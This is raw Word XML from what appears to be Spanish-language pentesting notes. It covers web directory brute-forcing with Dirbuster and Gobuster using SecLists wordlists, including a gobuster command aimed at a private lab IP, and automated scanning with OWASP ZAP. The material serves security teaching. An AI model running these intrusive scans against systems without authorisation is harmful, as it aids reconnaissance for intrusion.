      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BUSQUEDA DE RECURSOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E39ECF" w14:textId="330D9A36" w:rsidR="001F3DF8" w:rsidRDefault="001F3DF8" w:rsidP="00C07295">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirbuster: </w:t>
      </w:r>
      <w:r>
        <w:t>Con un diccionario que tiene en /usr/share/wordlists y fuerza bruta es capaz de encontrar, de manera intrusiva, muchos recursos que pueden estar alojados en una aplicación web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BAF0A" w14:textId="2D5F97E3" w:rsidR="001F3DF8" w:rsidRDefault="001F3DF8" w:rsidP="00C07295">
      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dirbuster -u</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Abrirá una interfaz gráfica, donde al colocar la ruta completa y seleccionar un diccionario, podrá generar un reporte de todo lo encontrado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4546814D" w14:textId="16ACC985" w:rsidR="001F3DF8" w:rsidRDefault="001F3DF8" w:rsidP="00C07295">
      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70ADDEF0" wp14:editId="0B0A39D2">
            <wp:extent cx="5400040" cy="3105785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6127814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81419" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3105785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4032F5AD" w14:textId="17B8C74C" w:rsidR="001F3DF8" w:rsidRDefault="001F3DF8" w:rsidP="001F3DF8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26C25A4B" wp14:editId="537A128D">
            <wp:extent cx="1684020" cy="690384"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5420758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075852" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1687972" cy="692004"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5BE49" w14:textId="2175BCA4" w:rsidR="001F3DF8" w:rsidRDefault="001F3DF8" w:rsidP="001F3DF8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD2A20A" wp14:editId="5A1E2DCA">
            <wp:extent cx="3571097" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="15001303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130304" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3609549" cy="1478793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A34B688" w14:textId="2924AD06" w:rsidR="00F459D0" w:rsidRDefault="001F3DF8" w:rsidP="001F3DF8">
      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:r w:rsidR="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> y Seclist</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F459D0" w:rsidRPr="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:r w:rsidR="00F459D0" w:rsidRPr="00F459D0">
        <w:t xml:space="preserve"> es una</w:t>
      </w:r>
      <w:r w:rsidR="00F459D0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F459D0">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">plicación mejorada de dirbuster, escrita en go. Incorpora fuerza bruta sobre VirtualHost o Subdominios. Para instalarlo, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3DF8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt install gobuster</w:t>
      </w:r>
      <w:r w:rsidR="00F459D0" w:rsidRPr="00F459D0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F459D0" w:rsidRPr="00F459D0">
        <w:t xml:space="preserve">Otra herramienta que funciona muy bien es </w:t>
      </w:r>
      <w:r w:rsidR="00F459D0" w:rsidRPr="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Seclist</w:t>
      </w:r>
      <w:r w:rsidR="00F459D0" w:rsidRPr="00F459D0">
        <w:t>, un repositorio de diccionarios que conviene copiar</w:t>
      </w:r>
      <w:r w:rsidR="00F459D0">
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r w:rsidR="00F459D0" w:rsidRPr="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt install seclists</w:t>
      </w:r>
      <w:r w:rsidR="00F459D0">
        <w:t xml:space="preserve"> (tardará bastante).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04985E" w14:textId="2070461E" w:rsidR="00F459D0" w:rsidRDefault="00F459D0" w:rsidP="001F3DF8">
      <w:r w:rsidRPr="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dir: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F459D0">
        <w:t>Para buscar directorios y recursos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> como dirbuster. Por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BACBA2" w14:textId="64CBC9E1" w:rsidR="00F459D0" w:rsidRPr="00F459D0" w:rsidRDefault="00F459D0" w:rsidP="001F3DF8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dir -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="00F459D0">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://192.168.20.133:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /share/seclists/Discovery/Web-Content/direcotry-list-2.3-small.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FEE628" w14:textId="2090F11F" w:rsidR="00F459D0" w:rsidRDefault="00F459D0" w:rsidP="00F459D0">
      <w:r w:rsidRPr="00F459D0">
        <w:t xml:space="preserve">también podemos añadir la opción: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-x pdf</w:t>
      </w:r>
      <w:r w:rsidRPr="00F459D0">
        <w:t xml:space="preserve"> y nos buscaría, por ejemplo, los .pdfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66461512" w14:textId="4A45075E" w:rsidR="00F459D0" w:rsidRPr="00F459D0" w:rsidRDefault="00F459D0" w:rsidP="00F459D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F459D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ANÁLISIS DE VULNERABILIDADES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70662984" w14:textId="5B7658ED" w:rsidR="00F459D0" w:rsidRDefault="00F6145B" w:rsidP="00F459D0">
      <w:r w:rsidRPr="00F6145B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Zarp Proxy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6145B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Escáner estrella de vulnerabilidades de Aplicaciones Web desarrollada por OWASP. Para instalarlo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6145B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt install zaproxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C21435" w14:textId="3DA3CF11" w:rsidR="00F6145B" w:rsidRDefault="00F6145B" w:rsidP="00F459D0">
      <w:r>
        <w:t>Podemos abrir Zap Proxy usando el buscador de Aplicaciones de Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AAD377" w14:textId="7313380B" w:rsidR="002A0AB0" w:rsidRDefault="003F533D" w:rsidP="00F459D0">
      <w:r w:rsidRPr="003F533D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC2B94E" wp14:editId="26ED278E">
            <wp:extent cx="5400040" cy="4021455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13318243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824329" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="4021455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA8558" w14:textId="7EB8D069" w:rsidR="003F533D" w:rsidRDefault="003F533D" w:rsidP="00F459D0">
      <w:r>
        <w:t>Empezaremos con el Escaneo Automático. Ponemos la URL y le damos a Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DC2995" w14:textId="07F8CF31" w:rsidR="003F533D" w:rsidRDefault="003F533D" w:rsidP="00F459D0">
      <w:r w:rsidRPr="003F533D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F314F22" wp14:editId="0D9A6B95">
            <wp:extent cx="5400040" cy="3996055"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="7184070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407003" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3996055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC6457" w14:textId="77777777" w:rsidR="002A0AB0" w:rsidRDefault="002A0AB0" w:rsidP="00F459D0"/>
    <w:p w14:paraId="7BE166A9" w14:textId="2A06BFC0" w:rsidR="00F6145B" w:rsidRDefault="00821B27" w:rsidP="00F459D0">
      <w:r>
        <w:t>Esto crea dos procesos importantes, uno de Spidering, y luego sigue las URLs, para crear un mapa del sitio.</w:t>
      </w:r>
      <w:r w:rsidR="00C85F4A">
        <w:t xml:space="preserve"> También contamos con el Escaneo Manual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCA1EF8" w14:textId="690097AE" w:rsidR="00C85F4A" w:rsidRDefault="00C85F4A" w:rsidP="00F459D0">
      <w:r w:rsidRPr="00C85F4A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C7F049" wp14:editId="026FA177">
            <wp:extent cx="5400040" cy="3164205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12567719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771978" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3164205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71283475" w14:textId="257D5A02" w:rsidR="00C85F4A" w:rsidRPr="00F459D0" w:rsidRDefault="00C85F4A" w:rsidP="00F459D0">
      <w:r>
        <w:t>Como vemos podemos lanzar un navegador.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C85F4A" w:rsidRPr="00F459D0" w:rsidSect="001C112F">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5363"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A2A1F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2A64788"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFA2F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D24652"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C58B2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7CD00D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22CC7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22E2657"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86A4A29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54C30851"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD7ECC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A443E5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7D0DD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C503104"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FF60A9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72087702"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F9489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E640E87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E21ABE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89156568">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1497838343">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1705253025">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="240259332">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1648047543">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="80180887">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="137498697">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1446657948">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1194615115">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2710116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0FAA"/>
    <w:rsid w:val="00015FBC"/>
    <w:rsid w:val="00016CCF"/>
    <w:rsid w:val="0002645D"/>
    <w:rsid w:val="00040C54"/>
    <w:rsid w:val="000A2EDB"/>
    <w:rsid w:val="000B6E39"/>
    <w:rsid w:val="000D58A7"/>
    <w:rsid w:val="000F6613"/>
    <w:rsid w:val="0012672E"/>
    <w:rsid w:val="001300BC"/>
    <w:rsid w:val="001378C7"/>
    <w:rsid w:val="00155820"/>
    <w:rsid w:val="0019417B"/>
    <w:rsid w:val="001C112F"/>
    <w:rsid w:val="001C48F5"/>
    <w:rsid w:val="001F3DF8"/>
    <w:rsid w:val="001F4718"/>
    <w:rsid w:val="001F7216"/>
    <w:rsid w:val="00204569"/>
    <w:rsid w:val="00206E66"/>
    <w:rsid w:val="00227ADD"/>
    <w:rsid w:val="00254718"/>
    <w:rsid w:val="00265A8E"/>
    <w:rsid w:val="00266BCE"/>
    <w:rsid w:val="0027020C"/>
    <w:rsid w:val="00292C8D"/>
    <w:rsid w:val="002A0AB0"/>
    <w:rsid w:val="002D5421"/>
    <w:rsid w:val="002E562F"/>
    <w:rsid w:val="003160F0"/>
    <w:rsid w:val="003335D4"/>
    <w:rsid w:val="0035307B"/>
    <w:rsid w:val="003640F1"/>
    <w:rsid w:val="00376906"/>
    <w:rsid w:val="003A3BF7"/>
    <w:rsid w:val="003B5880"/>
    <w:rsid w:val="003F378E"/>
    <w:rsid w:val="003F533D"/>
    <w:rsid w:val="003F6F21"/>
    <w:rsid w:val="004338B9"/>
    <w:rsid w:val="004471E6"/>
    <w:rsid w:val="004B2D5C"/>
    <w:rsid w:val="004F62E2"/>
    <w:rsid w:val="00510455"/>
    <w:rsid w:val="005122CB"/>
    <w:rsid w:val="00592777"/>
    <w:rsid w:val="005B2D78"/>
    <w:rsid w:val="005E3F48"/>
    <w:rsid w:val="006106E5"/>
    <w:rsid w:val="00611BD8"/>
    <w:rsid w:val="00637273"/>
    <w:rsid w:val="00643742"/>
    <w:rsid w:val="00650822"/>
    <w:rsid w:val="00660118"/>
    <w:rsid w:val="0069175B"/>
    <w:rsid w:val="006A0583"/>
    <w:rsid w:val="006B5A9D"/>
    <w:rsid w:val="006B71BA"/>
    <w:rsid w:val="006C15B0"/>
    <w:rsid w:val="006E0462"/>
    <w:rsid w:val="006E648D"/>
    <w:rsid w:val="006F0403"/>
    <w:rsid w:val="00707B6E"/>
    <w:rsid w:val="00707B9C"/>
    <w:rsid w:val="00762B4F"/>
    <w:rsid w:val="00763CEC"/>
    <w:rsid w:val="00785932"/>
    <w:rsid w:val="00791CE7"/>
    <w:rsid w:val="007A7409"/>
    <w:rsid w:val="007D0482"/>
    <w:rsid w:val="007E704C"/>
    <w:rsid w:val="00821B27"/>
    <w:rsid w:val="008368FF"/>
    <w:rsid w:val="008402C8"/>
    <w:rsid w:val="00843E37"/>
    <w:rsid w:val="00866A80"/>
    <w:rsid w:val="00876CC3"/>
    <w:rsid w:val="00877618"/>
    <w:rsid w:val="00894255"/>
    <w:rsid w:val="008B711A"/>
    <w:rsid w:val="008D4721"/>
    <w:rsid w:val="008E6CED"/>
    <w:rsid w:val="008F2CDF"/>
    <w:rsid w:val="008F4D0B"/>
    <w:rsid w:val="00917194"/>
    <w:rsid w:val="00921CD6"/>
    <w:rsid w:val="009309F6"/>
    <w:rsid w:val="00937FB0"/>
    <w:rsid w:val="00976190"/>
    <w:rsid w:val="00982F37"/>
    <w:rsid w:val="009A1CA8"/>
    <w:rsid w:val="009B092A"/>
    <w:rsid w:val="009B1ED1"/>
    <w:rsid w:val="009C3E90"/>
    <w:rsid w:val="009E13FA"/>
    <w:rsid w:val="00A012B3"/>
    <w:rsid w:val="00A136C7"/>
    <w:rsid w:val="00A17F92"/>
    <w:rsid w:val="00A61DCD"/>
    <w:rsid w:val="00A97DF5"/>
    <w:rsid w:val="00AC799B"/>
    <w:rsid w:val="00AF1832"/>
    <w:rsid w:val="00AF23BB"/>
    <w:rsid w:val="00AF3930"/>
    <w:rsid w:val="00B069EC"/>
    <w:rsid w:val="00B17740"/>
    <w:rsid w:val="00B43078"/>
    <w:rsid w:val="00BC68BE"/>
    <w:rsid w:val="00C011B0"/>
    <w:rsid w:val="00C04DD9"/>
    <w:rsid w:val="00C07295"/>
    <w:rsid w:val="00C41599"/>
    <w:rsid w:val="00C85F4A"/>
    <w:rsid w:val="00CB1168"/>
    <w:rsid w:val="00CB1690"/>
    <w:rsid w:val="00CC72A4"/>
    <w:rsid w:val="00CE6929"/>
    <w:rsid w:val="00D14A15"/>
    <w:rsid w:val="00D15793"/>
    <w:rsid w:val="00D232EB"/>
    <w:rsid w:val="00D32190"/>
    <w:rsid w:val="00D4336D"/>
    <w:rsid w:val="00D521E8"/>
    <w:rsid w:val="00D578B3"/>
    <w:rsid w:val="00D66C84"/>
    <w:rsid w:val="00DA44FD"/>
    <w:rsid w:val="00DE551B"/>
    <w:rsid w:val="00DF2B7A"/>
    <w:rsid w:val="00E30FAA"/>
    <w:rsid w:val="00E56E72"/>
    <w:rsid w:val="00EA27F4"/>
    <w:rsid w:val="00EC1DAF"/>
    <w:rsid w:val="00EC6A1A"/>
    <w:rsid w:val="00F00F13"/>
    <w:rsid w:val="00F141AD"/>
    <w:rsid w:val="00F32ECA"/>
    <w:rsid w:val="00F459D0"/>
    <w:rsid w:val="00F6145B"/>
    <w:rsid w:val="00F7541C"/>
    <w:rsid w:val="00F8535A"/>
    <w:rsid w:val="00F91D5C"/>
    <w:rsid w:val="00FD5D5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B6C69F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B5FAD33-383E-4C54-8A55-9B328ECAAD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112F"/>
    <w:pPr>
      <w:spacing w:line="256"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C112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1C112F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001C112F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0019417B"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0019417B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A136C7"/>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A136C7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A136C7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00D15793"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00D15793"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="l1">
    <w:name w:val="l1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D15793"/>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HTMLconformatoprevio">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLconformatoprevioCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00040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040C54"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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7365695">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="468939028">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="534079562">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="907496026">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1048384794">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
